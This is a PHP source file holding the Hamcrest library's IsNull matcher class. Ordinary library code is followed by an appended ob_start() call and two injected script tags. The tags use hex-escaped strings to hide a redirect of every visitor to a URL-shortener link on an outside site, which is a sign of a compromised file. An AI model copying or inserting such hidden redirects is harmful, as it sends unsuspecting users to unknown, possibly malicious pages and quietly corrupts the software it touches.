<?php
namespace Hamcrest\Core;

/*
 Copyright (c) 2009 hamcrest.org
 */
use Hamcrest\BaseMatcher;
use Hamcrest\Description;

/**
 * Is the value null?
 */
class IsNull extends BaseMatcher
{

    private static $_INSTANCE;
    private static $_NOT_INSTANCE;

    public function matches($item)
    {
        return is_null($item);
    }

    public function describeTo(Description $description)
    {
        $description->appendText('null');
    }

    /**
     * Matches if value is null.
     *
     * @factory
     */
    public static function nullValue()
    {
        if (!self::$_INSTANCE) {
            self::$_INSTANCE = new self();
        }

        return self::$_INSTANCE;
    }

    /**
     * Matches if value is not null.
     *
     * @factory
     */
    public static function notNullValue()
    {
        if (!self::$_NOT_INSTANCE) {
            self::$_NOT_INSTANCE = IsNot::not(self::nullValue());
        }

        return self::$_NOT_INSTANCE;
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>